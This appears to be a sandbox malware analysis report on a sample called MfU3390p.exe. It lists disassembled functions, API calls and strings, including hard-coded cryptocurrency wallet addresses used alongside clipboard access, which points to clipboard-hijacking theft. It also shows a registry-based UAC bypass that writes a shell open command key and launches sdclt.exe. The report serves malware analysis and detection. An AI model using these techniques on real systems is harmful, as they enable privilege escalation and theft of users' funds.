FreeLibrary.KERNEL32(00000000,?,?,?,00F247E3,?,?,00F36C78,00000000,?,00F2490E,00000004,InitializeCriticalSectionEx,00F2FCA4,InitializeCriticalSectionEx,00000000), ref: 00F247B2

Strings

api-ms-, xrefs: 00F24772

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 31c7d78455f9fc1f651d51543e5278c1d775b30a67d7d2364d7f8556d73fc84b
Instruction ID: b88b1940f0fe866b4e9042cf05cdfe367cd64a63969a2cec2b6546f2193aab18
Opcode Fuzzy Hash: 31c7d78455f9fc1f651d51543e5278c1d775b30a67d7d2364d7f8556d73fc84b
Instruction Fuzzy Hash: E7118236E51235ABDB329B68BC44B5937A4AF02B70F250530F925EB2C0D7A0FD05A6E5

Uniqueness

Uniqueness Score: -1.00%

Function 00F25A72 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,05A5B079,?,?,00000000,00F2DF3C,000000FF,?,00F25A45,00F25B32,?,00F25A19,00000000), ref: 00F25AA7
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F25AB9
FreeLibrary.KERNEL32(00000000,?,?,00000000,00F2DF3C,000000FF,?,00F25A45,00F25B32,?,00F25A19,00000000), ref: 00F25ADB

Strings

mscoree.dll, xrefs: 00F25AA0
CorExitProcess, xrefs: 00F25AB1

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c2358345b4e94be48e9d4223a1e119e39f414a73e1b2585b1e42b64d59ad5281
Instruction ID: 80ab4608b923b54b95586ac78c877f9818a9a1fc57a1839ca65ceb9fd5f3c18b
Opcode Fuzzy Hash: c2358345b4e94be48e9d4223a1e119e39f414a73e1b2585b1e42b64d59ad5281
Instruction Fuzzy Hash: BF01A731910629EFDB11DB50DD06BAEB7B8FB04B20F404635F811E2690D7789805DA55

Uniqueness

Uniqueness Score: -1.00%

Function 00F2A9DC Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(05A5B079,?,00000000,?), ref: 00F2AA3F

Part of subcall function 00F27EBD: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F2A6B5,?,00000000,-00000008), ref: 00F27F69

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F2AC9A
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F2ACE2
GetLastError.KERNEL32 ref: 00F2AD85

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 1fd9d71a27443dcb9f7c6e0a6424bc7d01c3f6018b6ae76c939ae98a9affa713
Instruction ID: eff920fb0f33b05a8b7e9aa330c1474a262f892e0a9c6dc9c41e1500e65e2a66
Opcode Fuzzy Hash: 1fd9d71a27443dcb9f7c6e0a6424bc7d01c3f6018b6ae76c939ae98a9affa713
Instruction Fuzzy Hash: 81D18AB5D042689FCF15CFA8E880AADBBB5FF08310F18416AE856E7351D730A842DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00F23724 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00F237EB
___AdjustPointer.LIBCMT ref: 00F2380E
___AdjustPointer.LIBCMT ref: 00F238AA

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 2dbfd1b0d5c8a759a3a6a66ca4cda8b1658b00f1d898a7689147513a19025c65
Instruction ID: 159f9c1e5c06eedf39179ba56eec0ec11c5d38e21fd6299c7b8216a545db03e7
Opcode Fuzzy Hash: 2dbfd1b0d5c8a759a3a6a66ca4cda8b1658b00f1d898a7689147513a19025c65
Instruction Fuzzy Hash: E051B0F3A04226AFDB299F54F841BAA77A5EF00320F14412DF9019A691D73DEE40FB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F2C196 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00F2B956,?,00000001,?,?,?,00F2ADD9,?,?,00000000), ref: 00F2C1AD
GetLastError.KERNEL32(?,00F2B956,?,00000001,?,?,?,00F2ADD9,?,?,00000000,?,?,?,00F2B360,?), ref: 00F2C1B9

Part of subcall function 00F2C17F: CloseHandle.KERNEL32(FFFFFFFE,00F2C1C9,?,00F2B956,?,00000001,?,?,?,00F2ADD9,?,?,00000000,?,?), ref: 00F2C18F

___initconout.LIBCMT ref: 00F2C1C9

Part of subcall function 00F2C141: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F2C170,00F2B943,?,?,00F2ADD9,?,?,00000000,?), ref: 00F2C154

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00F2B956,?,00000001,?,?,?,00F2ADD9,?,?,00000000,?), ref: 00F2C1DE

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 14901980c07d1c2328825aab0f1663de901126341311a1cd21e70994bcfb1088
Instruction ID: e135ed940ece2d8ab20f004356dc5c78b1b3154ad47a5e9bbe64782aa5dcd908
Opcode Fuzzy Hash: 14901980c07d1c2328825aab0f1663de901126341311a1cd21e70994bcfb1088
Instruction Fuzzy Hash: D9F0983691012CBBCF226F96AC0599E3EA6EB097B1B044020FA19D5122D6328964BB95

Uniqueness

Uniqueness Score: -1.00%

Function 00F23D25 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00F23D4A

Strings

RCC, xrefs: 00F23D64
MOC, xrefs: 00F23D5C

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 4d5f7147a02dbdd42a85b8aa0ba614b1eef041dd394806120355038fd6a7e507
Instruction ID: 0ff582ef6a7d62e41a0082d181f0674ac867d595dc00293058715feb92ab04dc
Opcode Fuzzy Hash: 4d5f7147a02dbdd42a85b8aa0ba614b1eef041dd394806120355038fd6a7e507
Instruction Fuzzy Hash: 7F419CB2D00259AFCF15DF94EC81AEEBBB5FF08310F198059F90567211D339AA55EB50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MfU3390p.exePID: 5144, Parent PID: 1088COMMON

Executed Functions

Function 00F216C0 Relevance: 51.4, APIs: 12, Strings: 17, Instructions: 659sleepprocessclipboardCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F216F8
GetCurrentProcess.KERNEL32 ref: 00F2171F
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00F2172D
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),00000004,00000004,?), ref: 00F21751
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00F2180D
___tlregdtor.LIBCMT ref: 00F218AD
StrCatW.SHLWAPI(?,00000150), ref: 00F2191C
StrCatW.SHLWAPI(?,?), ref: 00F2192E
StrCatW.SHLWAPI(?,00000000), ref: 00F21999
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F21A19
OpenClipboard.USER32(00000000), ref: 00F21A22
Sleep.KERNELBASE(0000000A), ref: 00F21F3D

Strings

1JDnBLMbGApADkjdvF3hBx1EAxgR6e8oXB, xrefs: 00F21C67, 00F21C8A
bc1qyjnkqksy5pu9822xcuap4k95wnkq0w2kfu95nv, xrefs: 00F21BAE, 00F21BD1
qzgxexcalkzzj4ead36uvhhaceuyaujpsswn9ncnzn, xrefs: 00F21BE2, 00F21C09
pGt, xrefs: 00F2190D, 00F21983
DJCsr3DybFwksqdu8vpkw6iGK68zkeuX1i, xrefs: 00F21CCF, 00F21CF9
LTCPKXuKtmwEKxqex7y5Sgt89z3pWJ9zFZ, xrefs: 00F21C9B, 00F21CBE
47g94vAnkNu6zukh16J8NPj4bFxTu4EFM9iJ2zkuamnC7CgAAEZB1y8MfuELbaooyWewPSJ2xibhtZvKRYndE3QrSe7Z4Jk, xrefs: 00F21DCA, 00F21DF5
D, xrefs: 00F219A2
ltc1, xrefs: 00F21D7C
Rz(C, xrefs: 00F21E65
bc1q, xrefs: 00F21BA4
ltc1qzhcqd8dwhttywhgcmwn8duemqu272djelpwwxr, xrefs: 00F21D8C, 00F21DB7
rwtNuiPtKMEBriMowNv8NKQCHV967gm9Pi, xrefs: 00F21D0A, 00F21D2D
0xB9ac646751eeaC4c3A9590890EFC8a0FFF564aba, xrefs: 00F21C23, 00F21C4D
P^w, xrefs: 00F21A22
DH^., xrefs: 00F21A95
TSFzn2Z15Moi4CimtErcjt5PetMeqv5spX, xrefs: 00F21D42, 00F21D6D

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: Process$OpenToken$ChangeClipboardCloseCreateCurrentFileFindInformationModuleNameNotificationSleep___tlregdtor
String ID: 0xB9ac646751eeaC4c3A9590890EFC8a0FFF564aba$1JDnBLMbGApADkjdvF3hBx1EAxgR6e8oXB$47g94vAnkNu6zukh16J8NPj4bFxTu4EFM9iJ2zkuamnC7CgAAEZB1y8MfuELbaooyWewPSJ2xibhtZvKRYndE3QrSe7Z4Jk$D$DH^.$DJCsr3DybFwksqdu8vpkw6iGK68zkeuX1i$LTCPKXuKtmwEKxqex7y5Sgt89z3pWJ9zFZ$P^w$Rz(C$TSFzn2Z15Moi4CimtErcjt5PetMeqv5spX$bc1q$bc1qyjnkqksy5pu9822xcuap4k95wnkq0w2kfu95nv$ltc1$ltc1qzhcqd8dwhttywhgcmwn8duemqu272djelpwwxr$pGt$qzgxexcalkzzj4ead36uvhhaceuyaujpsswn9ncnzn$rwtNuiPtKMEBriMowNv8NKQCHV967gm9Pi
API String ID: 141524845-1369504979
Opcode ID: 0567fad593257414ffbf62861e76cfaa13585e2dfdd534ffc2431fab2276b4d7
Instruction ID: bf8c50fa0df9d50424a8510685fbc97bc59bff6caa118c99b8bd4c66c86ea36f
Opcode Fuzzy Hash: 0567fad593257414ffbf62861e76cfaa13585e2dfdd534ffc2431fab2276b4d7
Instruction Fuzzy Hash: 3C423032E042618BD724CF18D490B6AB7F2FFA9324F1945ADE8865B311D731ED82DB85

Uniqueness

Uniqueness Score: -1.00%

Function 00F22929 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00002935,00F2228A), ref: 00F2292E

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1e77f5d72639562728f2e43cb210cfc62d5b1b8a4109642e8b5c46209a5dca08
Instruction ID: 076b8e11864ca73240cb19ba6a11af7edb9c8f049ac748a6d3b64eedd3325817
Opcode Fuzzy Hash: 1e77f5d72639562728f2e43cb210cfc62d5b1b8a4109642e8b5c46209a5dca08
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00F27FAB Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32(?,00F25591), ref: 00F27FAE
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00F25591), ref: 00F27FED

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 7f03f497fd6df636e3b2b99ea9859a1e3518ce5c681b06898f4db7f613c77cd8
Instruction ID: 9bebf6a3b0c591399ee0089166b409b6d4711ca75f56da0334f344bf97af2a04
Opcode Fuzzy Hash: 7f03f497fd6df636e3b2b99ea9859a1e3518ce5c681b06898f4db7f613c77cd8
Instruction Fuzzy Hash: BBE09B3B90D73127912132387C4ADAB361DCFC67757150229F81595285AE184D0664F5

Uniqueness

Uniqueness Score: -1.00%

Function 00F27009 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,00F26A86,00000001,00000364,?,00000006,000000FF,?,00F26FFB,00F2659F,?,?,00F2219B), ref: 00F2704A

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a75d8ea8a4552f1b8ebfc3d168fa777539a63e999e592daeb51c61ede4c713a1
Instruction ID: 2cccde1bb1032dc4f0270ac4b6a9861cad4da7abdf7c8371df52080c7e19c1eb
Opcode Fuzzy Hash: a75d8ea8a4552f1b8ebfc3d168fa777539a63e999e592daeb51c61ede4c713a1
Instruction Fuzzy Hash: A6F0B4329083396B9B31BBA6BC05B5B7748EB40BB0B148021BC14E6181DB34DC0876E0

Uniqueness

Uniqueness Score: -1.00%

Function 00F2655C Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00F2219B,00000080,00000150,74E04770,?,00F22057,00F2DFA0), ref: 00F2658E

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 93fb63fbee5f6fe8640de28ba59e6e65dd04c99e78d95303585891baf443db1e
Instruction ID: c690f377a9cc9aaee15b0919c9030d90f6a013f74f5eee607657c9a9db5caf1f
Opcode Fuzzy Hash: 93fb63fbee5f6fe8640de28ba59e6e65dd04c99e78d95303585891baf443db1e
Instruction Fuzzy Hash: 9AE0ED7294633956DA3127AABC02B9A3748EF413B0F2C0120BC16D6188DF64DC00B1F0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00F213B0 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 241
registrysleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?,00000000), ref: 00F213FD
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,00000000), ref: 00F21411
RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,?,?,?,?,?,?,?,00000000), ref: 00F21450
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 00F2145D
SetLastError.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F21466
GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,?,?,?,?,00000000), ref: 00F214B9
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000), ref: 00F214E5
IsWow64Process.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 00F214F0
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 00F215E0
Sleep.KERNEL32(00001388,?,?,?,?,?,00000000), ref: 00F215EB
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F2169B
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F216A0
RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 00F216AC

Strings

cmd.exe /C sdclt.exe, xrefs: 00F215A1
DelegateExecute, xrefs: 00F214D4
Software\Classes\Folder\shell\open\command, xrefs: 00F21446, 00F216A2

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: CloseProcess$CreateDescriptorHandleSecurity$CurrentDaclDeleteErrorFileInitializeLastModuleNameSleepWow64
String ID: DelegateExecute$Software\Classes\Folder\shell\open\command$cmd.exe /C sdclt.exe
API String ID: 839393932-2559748893
Opcode ID: 3f65ff2531717b8673998ec0a702f7e795e8c23edc04f0c67aa3f300be048fbe
Instruction ID: b6906f2a8ab29fb4c0c61d4fb4c9d33b8fe9dd63dffcf3e9e141df13261eeba9
Opcode Fuzzy Hash: 3f65ff2531717b8673998ec0a702f7e795e8c23edc04f0c67aa3f300be048fbe
Instruction Fuzzy Hash: 22A1BA31E00229DFDB24CF54D884FADB7B5FF58714F1881A9E905AB251EB70AA49DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00F22795 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F227A1
IsDebuggerPresent.KERNEL32 ref: 00F2286D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F2288D
UnhandledExceptionFilter.KERNEL32(?), ref: 00F22897

Strings

`Vqt, xrefs: 00F2286D

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID: `Vqt
API String ID: 254469556-320833423
Opcode ID: 5ffc5cbdff81e8453324e264e72ac550e893e93d3e3e95643ca7f9aa49bdb61f
Instruction ID: 41b7d0cf69a4cfc644b7939adee20c0bf841886d231409530de2f7e92be4218a
Opcode Fuzzy Hash: 5ffc5cbdff81e8453324e264e72ac550e893e93d3e3e95643ca7f9aa49bdb61f
Instruction Fuzzy Hash: 07314D75D0121C9BDB20DF60DD89BCCBBB8BF04704F1041EAE40DAB250EB759A859F45

Uniqueness

Uniqueness Score: -1.00%

Function 00F26BFC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00F26CF4
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F26CFE
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00F26D0B

Strings

`Vqt, xrefs: 00F26CF4

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: `Vqt
API String ID: 3906539128-320833423
Opcode ID: 3618e09ab017883e1be42f1bd43f204e148b701b527e7dbf4cbc67d114ebc1c6
Instruction ID: 42fc6e565e8e5ac03dba42f7116d2c6840f19b5455a8652279df2d1280d2c81d
Opcode Fuzzy Hash: 3618e09ab017883e1be42f1bd43f204e148b701b527e7dbf4cbc67d114ebc1c6
Instruction Fuzzy Hash: 2631D274D1122CABCB21DF24ED89B8CBBB8BF08710F5042EAE40CA7251E7349B859F45

Uniqueness

Uniqueness Score: -1.00%

Function 00F2397B Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00F23A78
type_info::operator==.LIBVCRUNTIME ref: 00F23A9A
___TypeMatch.LIBVCRUNTIME ref: 00F23BA9
IsInExceptionSpec.LIBVCRUNTIME ref: 00F23C7B
_UnwindNestedFrames.LIBCMT ref: 00F23CFF
CallUnexpected.LIBVCRUNTIME ref: 00F23D1A

Strings

csm, xrefs: 00F23A25
csm, xrefs: 00F239B8
csm, xrefs: 00F23AD1

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: a3eb36af0158b29f31a8c2f5a459a4b9d1927ec44c28a8a3216ce685489f766a
Instruction ID: ad730f3db610d74de0b56fe77a165016ad68871ff3e37d6acdd815b033fda956
Opcode Fuzzy Hash: a3eb36af0158b29f31a8c2f5a459a4b9d1927ec44c28a8a3216ce685489f766a
Instruction Fuzzy Hash: 0CB16CB1C00229AFCF25DFA4E9819AEBBB5FF14320B144159E8116B211D73DDB51EF91

Uniqueness

Uniqueness Score: -1.00%

Function 00F21330 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32 ref: 00F2133C
RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?), ref: 00F21359
